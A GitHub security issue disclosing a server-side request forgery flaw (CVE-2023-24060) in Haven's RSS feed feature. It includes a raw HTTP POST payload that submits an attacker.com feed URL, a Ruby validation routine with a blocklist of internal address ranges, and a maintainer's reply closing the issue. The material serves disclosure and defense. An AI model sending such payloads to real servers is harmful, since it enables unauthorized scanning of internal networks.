
[Security] Haven v5d15944 Server-Side Request Forgery (SSRF) - CVE-2023-24060 #51

Closed
Sean-McRae opened this issue Jan 23, 2023 · 1 comment


Sean-McRae commented Jan 23, 2023

A Security Advisory has been raised for Haven v5d15944 (CVE-2023-24060):

Description:
Haven v5d15944 allows Server-Side Request Forgery (SSRF) via the Feeds functionality.
Malicious authenticated users with the ability to create or add RSS Feeds to the website can supply an arbitrary host such as the host itself in an attempt to scan the internal network.

Affected URL (Parameter):
http://localhost:3000/feeds (url)

[screenshot attached to the report]

Suggested Fix:
Consider performing this action on the client side. There's no need for the server to fetch the RSS feed; have the user's browser fetch the latest feed when loading the page. This would also remove the need to have a script that will execute every so often to update the RSS feed.

Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24060
https://nvd.nist.gov/vuln/detail/CVE-2023-24060
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Payload:

```http
POST /feeds HTTP/1.1
Host: localhost:3000
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Cookie: _blog_session=[]
Connection: close

utf8=%E2%9C%93&authenticity_token=[]&feed%5Burl%5D=https%3A%2F%2Fattacker.com%2Frss&commit=Add+Feed
```
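As an added example, not Haven's code and not part of the report above, here is the server-side alternative to the suggested client-side fix: validating a user-supplied feed URL before the server fetches it, along the lines of the OWASP SSRF prevention cheat sheet linked in the references. Haven is a Rails application, so the example is Ruby. The `resolver:` keyword, the `SAMPLE_RESOLVER` table and every hostname and address in it are assumptions constructed for offline demonstration; in production the default resolver (`Resolv.getaddresses`) is used.

```ruby
require "ipaddr"
require "resolv"
require "uri"

# Address ranges a server-side fetcher must never be pointed at. IPv4-mapped
# IPv6 addresses (::ffff:a.b.c.d) are unwrapped before the check below, so
# they are covered by the IPv4 entries.
BLOCKED_RANGES = [
  "0.0.0.0/8",        # "this" network
  "127.0.0.0/8",      # loopback: the host itself, as in the report
  "10.0.0.0/8",       # RFC 1918 private
  "172.16.0.0/12",    # RFC 1918 private
  "192.168.0.0/16",   # RFC 1918 private
  "169.254.0.0/16",   # link-local, including cloud instance metadata services
  "100.64.0.0/10",    # carrier-grade NAT
  "::1/128",          # IPv6 loopback
  "fc00::/7",         # IPv6 unique local
  "fe80::/10",        # IPv6 link-local
].map { |cidr| IPAddr.new(cidr) }.freeze

class UnsafeFeedUrl < StandardError; end

# True when +host+ is an IP literal rather than a name that needs resolving.
def literal_ip?(host)
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError
  false
end

# Validates a feed URL and returns the addresses it would be fetched from.
# Raises UnsafeFeedUrl for anything a server must not fetch. The resolver is
# injectable (assumption for this example) so the check runs without network.
def safe_feed_addresses(raw_url, resolver: ->(host) { Resolv.getaddresses(host) })
  uri = URI.parse(raw_url.to_s.strip)
  scheme = uri.scheme&.downcase
  raise UnsafeFeedUrl, "only http/https feeds are allowed" unless %w[http https].include?(scheme)
  host = uri.hostname # strips the brackets of an IPv6 literal
  raise UnsafeFeedUrl, "missing host" if host.nil? || host.empty?
  raise UnsafeFeedUrl, "credentials in URL are not allowed" if uri.userinfo

  addresses = literal_ip?(host) ? [host] : Array(resolver.call(host))
  raise UnsafeFeedUrl, "host does not resolve" if addresses.empty?

  # Every address is checked: a name resolving to one public and one private
  # address must still be rejected.
  addresses.each do |addr|
    ip = IPAddr.new(addr)
    ip = ip.native if ip.ipv4_mapped? # ::ffff:127.0.0.1 -> 127.0.0.1
    if BLOCKED_RANGES.any? { |range| range.include?(ip) }
      raise UnsafeFeedUrl, "#{host} resolves to blocked address #{addr}"
    end
  end
  addresses
end

# Boolean convenience wrapper; malformed input counts as unsafe.
def feed_url_safe?(raw_url, resolver: ->(host) { Resolv.getaddresses(host) })
  safe_feed_addresses(raw_url, resolver: resolver)
  true
rescue UnsafeFeedUrl, URI::InvalidURIError, IPAddr::InvalidAddressError
  false
end

# Constructed DNS table standing in for real resolution in this example.
SAMPLE_RESOLVER = lambda do |host|
  {
    "feed.example"     => ["203.0.113.10"],
    "localhost"        => ["127.0.0.1", "::1"],
    "intranet.example" => ["10.1.2.3"],
    "dual.example"     => ["203.0.113.10", "::ffff:192.168.0.5"],
  }.fetch(host, [])
end

if $PROGRAM_NAME == __FILE__
  ["https://feed.example/rss", "http://localhost:3000/feeds",
   "http://[::ffff:10.0.0.1]/", "http://dual.example/rss"].each do |u|
    puts "#{u} -> #{feed_url_safe?(u, resolver: SAMPLE_RESOLVER) ? 'fetch' : 'reject'}"
  end
end
```

Two caveats matter when wiring this into a fetcher. The check resolves the name once, so the HTTP client must connect to the address that was validated rather than resolving again (otherwise a DNS rebinding attack or a differing address parser in the client can undo the check), and any redirect the feed server returns has to go through the same validation before it is followed.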
mawise (Contributor) commented Mar 10, 2023

Thanks for the report. Right now the only user who can modify feeds is the admin for a Haven so this seems pretty low risk. Hosted Havens each run in their own (virtual) network for further isolation. There are future plans I have for Haven where this will be more significant--I'll have to think about how I want to approach resolution.

@mawise mawise closed this as completed Mar 10, 2023